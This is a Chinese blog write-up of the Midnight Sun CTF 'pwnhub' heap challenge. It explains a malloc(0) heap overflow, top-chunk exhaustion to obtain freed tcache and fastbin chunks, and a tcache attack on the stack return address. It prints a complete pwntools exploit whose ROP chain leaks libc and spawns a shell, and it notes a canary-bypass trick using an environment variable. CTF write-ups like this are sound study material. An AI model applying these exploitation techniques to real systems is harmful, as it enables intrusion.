Midnight-sun pwnhub复现

已于 2022-04-07 22:49:57 修改
阅读量562 收藏
点赞数
分类专栏: CTF 工具问题&使用 文章标签: 安全 pwn 数据结构
于 2022-04-07 22:47:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45209963/article/details/124025596
版权

Midnight-sun pwnhub复现

这题比赛的时候跟队友大眼瞪小眼看了半天,house of orange 和house of force都不能用,莫得什么好的思路… 赛后找到了2019大佬的wp,做了一下复现

文章目录

环境问题

题目本身给了一个启动脚本 LD_LIBRARY_PATH=./lib/ ./lib/ld.so --preload libdl.so.2 ./pwnhub
做题的时候抄到脚本里面,结果发现gdb断到bash上面去了…进不了程序
看了2019的脚本发现正确的写法是这样子的

p = process("./lib/ld.so --preload libdl.so.2 ./pwnhub".split(),env={"LD_LIBRARY_PATH":"./lib/"})

查了pwntools的文档里面确实写了env需要单独指定,而且argv是一个list,executable是argv[0],官方给的样例也给出了这种多级调用的情况。至于为什么execute是ld.so,gdb却能断到程序本身,我觉得大概是自动设了follow或者干脆就是没有起新进程,ld.so装载完程序直接jump了

程序分析

传统堆题格式,给了read、leak、malloc三个功能。
leak是直接打印一个栈地址处(addr)的内容,一开始里面也是个栈地址,之后会被置为malloc出的堆地址。

read是往addr指向的地址处写特定长度,初始长度为0xff

malloc是根据输入的size+1进行malloc,然后将addr指向的地址换成malloc出的堆地址,read长度换成输入的size。

攻击思路

一开始,栈上0xff的read肯定有溢出,但是有canary,没办法利用。考虑堆攻击。
题目没有free,但是malloc里面,v3为signed int,如果令v3==-1,就会实现malloc(0),同时read长度置为0xff,也就是有堆溢出。这种情况下首先考虑house of force/orange。但是二者都要求malloc大小需要为较大的数,尝试了malloc负数,但被libc拦下来了…然后队友通过溢出改小top chunk再通过申请耗尽,最后拿到了tcache的free chunk。我们做到这里就无了…以下是看2019大佬wp得到的思路
—————————————————————————————————————————————
其实队友的思路已经比较接近了。耗尽完top chunk,它会通过sysmalloc再开辟一块top chunk,
而原top chunk在去除结尾0x20大小之后,被进行了free。通过不断重复溢出改top chunk+申请耗尽,可以不断获取到free的tcache chunk,最终获取到free的fastbin chunk。然后,当再次发生
top chunk耗尽时,由于有fastbin chunk存在,会进行malloc consolidate,最终使前一次耗尽产生的free fastbin转化为unsorted bin,而本次耗尽产生的依然通过free放入fastbin。
在这里插入图片描述
耗尽过程如上图所述。注意第一个top chunk含tcache_perthread_struct结构,耗尽方式略有不同。
最后两个top chunk如下图所示:
在这里插入图片描述
溢出到fastbin之后就是常规的fastbin 攻击,改写fd,两次申请拿到addr指向的地址,改写为返回地址,改写输入长度,再打rop即可。

exp

下面是我个人改写的exp,fastbin attack需要合适的错位,比较受限,我通过增加一次耗尽,获取了两个同size tcache,将攻击方式换为tcache attack,一定程度提高了稳定性。(tcache同样是LIFO,后一个释放的tcache会先被拿出,所以可以进行溢出)

# -*- coding:utf-8 -*-
from pwn import *                                                
#from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
p  = process("./lib/ld.so --preload libdl.so.2 ./pwnhub".split(),
		env={"LD_LIBRARY_PATH":"./lib/"})
#p = remote('127.0.0.1', 10001) 
#p = ssh(host='pwnable.kr',user='fd',password='guest',port=2222) 
#e = ELF()
#gdb.attach(p,'b* 0x401398')


#local_file = 
#libc  = 
#elf = ELF(local_file)



se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
sea     = lambda delim,data         :p.sendafter(delim, data)
rc      = lambda numb=4096          :p.recv(numb)
rl      = lambda                    :p.recvline()
ru      = lambda delims 	    :p.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr          :p.info(tag + ': {:#x}'.format(addr))



def read(content):
    p.recvuntil('> ')
    p.sendline('1')
    p.send(content)    

def leaks():
    p.recvuntil('> ')
    p.sendline('2')
    p.recvuntil('leak: ')
    leak=u64(p.recvuntil('\x7f').ljust(8,'\x00'))
    return leak

def leakh():
    p.recvuntil('> ')
    p.sendline('2')
    p.recvuntil('leak: ')
    leak=u64(p.recvuntil('\x55').ljust(8,'\x00'))
    return leak

def alloc(i):
    p.recvuntil('> ')
    p.sendline('3')
    p.recvuntil('size: ')
    p.sendline(str(i))

def quit(i):
    p.recvuntil('> ')
    p.sendline('4')

def make_free(i):
	for k in range(i): 
		alloc(-1)
		#第一个0x80 tcache
		if (k==0):
			heap=leakh()
			info('key,',heap)
			#通过leak获取tcache的key,
			read('a'*0x18+p64(0xd51))
			alloc(0x40)
			for j in range(22):
				alloc(0x80)
			alloc(0x80)
		elif(k!=9):
			read('a'*0x18+p64(0xf51))
			alloc(0x20)
			for j in range(26):
				alloc(0x80)
				#sla('>','2')
			alloc(0x80)
		#单纯为了填充的0x70 tcache链
		else:
			read('a'*0x18+p64(0xf51))
			alloc(0x40)
			alloc(0x40)
			for j in range(25):
				alloc(0x80)
			sla('>','2')
			alloc(0x80)
		#第二个0x80 tcache
	return heap	

stack=leaks()
info('stack',stack)

heap=make_free(10)
read(p64(0x43070)+p64(0x20))
#伪造unsorted bin尾过检查
alloc(-1)
read('a'*0x18+p64(0x43071))
#溢出,构造大unsorted bin
for i in range(966):
	alloc(0x80)
	#耗尽,直到下一个top chunk中的free fastbin之前为止
alloc(0x30)
alloc(0x80)   #overlap chunk

ret_addr = stack - 9 + 0x118
read('a'*0x10+p64(0)+p64(0x81)+p64(ret_addr)+p64(heap-656))
alloc(0x70) #tcache attack
alloc(0x70)

#以下rop部分照抄了2019大佬,因为不影响
———————————————————————————————————————————————————————————————————————
pop_rdi = p64(0x4015e3)
rop = pop_rdi + p64(0x405018) # rdi = address of got entry of puts
rop += p64(0x401368) # leak
rop += pop_rdi + p64(ret_addr + len(rop) + 3 * 8) # rdi = fake struct below
rop += p64(0x401336) # read
rop += p64(ret_addr + len(rop)) + p64(0x100)
# fake struct for read ROP function, its ptr points to itself
read(rop)

p.send(b'4')
p.recvuntil(b"leak: ")
libc_addr = u64(p.recvuntil(b'\n')[:-1].ljust(8, b'\x00')) - 0x783a0
# get leaked libc addr

#change rop2 according your system
rop2 = pop_rdi + p64(libc_addr + 0x18e1b0) # rdi = "/bin/sh" 
rop2 += p64(libc_addr + 0x49970) # system
rop2 += p64(0)
p.send(rop2)

p.interactive()

ps

赛后听说了一堆奇技淫巧的做法。

  • 通过栈溢出改环境变量设置MALLOC_MMAP_THRESHOLD_=1, 迫使用mmap分配堆块。因为ld和libc间没空隙,mmap到的堆块分配到canary依赖的fs:0x28下方,然后通过堆溢出覆盖把fs:0x28覆盖成固定值绕过canary做rop。
  • 通过改malloc_top_pad来减小sysmalloc出的top chunk间距

大佬们tql 感谢队友 www

xyzmpv
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux malloc内存申请相关参数设置
sun172270102的博客
04-23 3579
情况一、malloc小于128k的内存 malloc小于128k的内存时使用brk分配内存,将_edata往高地址推(只分配虚拟空间,不对应物理内存(因此没有初始化),第一次读/写数据时,引起内核缺页中断,内核才分配对应的物理内存,然后虚拟地址空间建立映射关系),如下图: 1、进程启动的时候,其(虚拟)内存空间的初始布局如图1所示。 其中,mmap内存映射文件是在堆和栈的中间(例如libc-2.2...
2022 PWNHUB春季赛复现
qq_49422880的博客
05-11 440
眼神得好 官方WP说的是这是一个“立体图”,具体怎么看自行百度,有几种解法 1.使用Stove直接偏移图像就能看到 偏移86的时候就能看到flag. 2.使用像素点相互异或
House Of Orange
qq_45595732的博客
11-26 1003
House Of Orange 本质:Unsorted bin attack 和 FSOP造成的组合漏洞利用方式。 House of orange源于一道题目,有时候只用到free top chunk的题目也会被归入该类中。 glibc版本<=2.23情况 特点:不需要free操作 核心原理: 1,获取unsorted bin ​ 在_int_malloc函数中,会依次检验 fastbin、small bins、unsorted bin、large bins 是否可以满足分配要求,因为尺寸问
Glibc内存管理--ptmalloc2源代码分析(十九)
iteye_7858的博客
05-30 343
5.5.2 ptmalloc_init()函数   ptmalloc_init() 函数比较长,将分段对这个函数做介绍。   static void ptmalloc_init (void) { #if __STD_C const char* s; #else char* s; #endif int secure = 0; if(...
glibc下malloc与free的实现原理(四):tcache机制
weixin_44215692的博客
04-11 1185
glibc下malloc与free的实现原理(四): tcache 一、概述 tcache是glibc某个版本后引入的新机制,目的是提高堆管理的性能。 事实上,在我们现在用pwndbg调试与堆有关的程序时,就会发现许多free chunk被归入了tcache 许多漏洞的利用也和tcache机制有关,因此研究tcache的机制是有必要的。 我们先不论tcache机制到底是什么(按照字面意思,有“高速缓存”之意),先就从tcache相关的新增代码的分析入手,最后就能总结出tcache机制究竟是什么。 二、新的相
Midnight-源码.rar
10-10
【标题】"Midnight-源码.rar"是一个包含源代码的压缩文件,很可能是一个软件或项目的源代码仓库。从名称来看,"Midnight"可能是项目的名字,暗示这可能是一个夜间主题、夜晚模式相关的项目,或者仅仅是开发者喜欢的...
Midnight-Xen-开源
04-24
Midnight Xen是一个完成zope Xen项目经理的项目。 我们还打算实现甘特图和珀特图功能。 首要任务是制作一个可以在Zope上正常运行的构建,然后在以后重新启动安全性。
midnight-marauders
05-20
"Midnight Marauders" 是一个基于Web的图像分享与评价平台,采用现代Web开发技术构建,旨在提供用户友好的界面和高效的图像处理能力。这个应用程序由前后端两部分组成,充分利用了JavaScript生态中的多种库和框架。 ...
Midnight-Tussle
03-22
午夜这是针对Art 164类的基于回合的,基于图块的Clash Royale类型的游戏。
midnight-leetcode:午夜锻炼
03-30
"午夜LeetCode"是一个编程练习项目,旨在帮助开发者在深夜时段提升他们的编程技能,特别是C++语言的应用。LeetCode是一个在线平台,提供了各种算法题目,涵盖了数据结构、排序算法、搜索算法等众多编程领域。...
《Linux性能优化实战》学习笔记 Day02
过了这个村没这个老王的博客
01-17 879
默认64位系统分配区数为:cpu核数*8,如当前环境16核系统分配区数为128个,每个64M上限的话最多可达8G,限制上限后,后续不够的申请会直接走mmap分配和munmap回收,不会进入ptmalloc2的buffer池。不过本质上,它是哈希表的变种,限制每个哈希桶只有 1 个比特位,所以,虽然它消耗的空间更少,但仅用于辅助数据的主索引,快速判断对象是否存在。(当然,JVM的内存逃逸分析会帮我们把一些分配在堆中的对象直接分配在找上,加速运行)(栈的容量有限,如 CentOS 7 中是 8MB 字节)
Linux环境变量:查、改、删
DecadeLive的博客
09-18 1293
Linux环境变量需要知道的内容: 什么是环境变量; 创建自己的环境变量; 删除环境变量; 默认shell环境变量; 设置PATH环境变量; 定位环境文件; 环境变量 Environment variable,定义系统会话和环境信息的变量或者参数。可以快速访问和修改内存中的数据。 系统的环境变量都用大写,以区分普通用户的环境变量。 全局变量 全局变量对shell会话和所有子shel...
JS逆向之某榜搜索接口JS加密生成参数nonce、xyz
tiebanggg的博客
02-26 3696
前言 tiebanggg又来更新了,本文章仅供学习研究,如若侵犯到贵公司权益请联系229456906@qq.com第一时间进行删除;切忌用于一切非法途径,否则后果自行承担! 描述 最近在巩固学习js逆向,为加深记忆就此写下文章进行记录。本次逆向源于群里一位群友发出的需求,感谢带来练手项目 本次地址:aHR0cHM6Ly9uZXdyYW5rLmNuL3B1YmxpYy9pbmZvL3NlYXJjaC5odG1sP3ZhbHVlPWd6eXhnenl4JmlzQmluZD1mYWxzZQ== 还是一样,废话不多
Python-函数返回值,作用域,函数销毁,闭包
weixin_30426957的博客
08-23 270
阅读目录:   1、函数的返回值   2、函数嵌套   3、作用域 ***   4、闭包**   5、nonlocal 关键字   6、默认值的作用域   7、变量名解析原则LEGB   8、函数的销毁 内容: 1、函数的返回值:   单条 return 语句: 1 def showplus(x): 2 print(x) 3 ...
头文件malloc.h:函数 mallopt()的选项
阿群的笔记(同步备份自简书)
02-21 2050
下面以一个例子来说明内存分配的原理: 情况一、malloc小于128k的内存,使用brk分配内存,将_edata往高地址推(只分配虚拟空间,不对应物理内存(因此没有初始化),第一次读/写数据时,引起内核缺页中断,内核才分配对应的物理内存,然后虚拟地址空间建立映射关系),如下图: 1、进程启动的时候,其(虚拟)内存空间的初始布局如图1所示。 其中,mmap内存映射文件是在堆和栈的中间...
一个移植十分方便的malloc函数族的实现
ZHONGkunjia的专栏
08-05 5916
相信学习过c语言的人都知道malloc、free函数,这里就不多说怎么用了。这里要说的是:提供它们的实现。     该实现方法由uboot中malloc等函数的实现改编而来。已经过验证,没有问题。    ------多说一句,该实现支持物理地址malloc、free。。。,不支持虚拟地址的映射     该malloc的源码实现,很方便移植。特别是在BootLoader或者单片机开发过程中,
2022 hgame pwn wp
weixin_45209963的博客
03-27 4686
2022 hgame pwn wp 本来早就写好了,但是由于复试毕设等等原因拖到今天才发 包括了绝大部分题目,除了算法题spfa和bpwn,剩下一些简单题懒得写了orz 文章目录2022 hgame pwn wpWeek 1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orwWeek 2oldfashion_noteechoWeek 3changeable_noteelder_notesized_noteWeek 4vector Week 1 ent
*CTF babynote 复现
weixin_45209963的博客
04-26 2845
*CTF babynote 复现
高版本libc下的off by null
weixin_45209963的博客
09-08 1761
新版额外检查这个chunk size与被free掉的chunk的prev size是否相等,chunk overlap必须要伪造后者,而前者不可控,故一般打法失效。,通过大循环将这三个chunk全部放入同一个large bins。此时由于large bins机制,中间大小的chunk的。均相同,分别指向比自己小/大的chunk,将该chunk取下,同时伪造好。),残留指针为头节点libc指针,此时需要申请到该chunk,再申请一个。的size,再将该chunk的bk取下并写其fd为该chunk(伪造。
Midnight = 1/2(Sunrise - Sunset)java表示
最新发布
05-25
假设Sunrise和Sunset是以毫秒为单位表示的时间戳,可以使用以下Java代码计算Midnight: ``` long sunrise = /* 用毫秒表示的日出时间戳 */; long sunset = /* 用毫秒表示的日落时间戳 */; long midnight = (sun...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值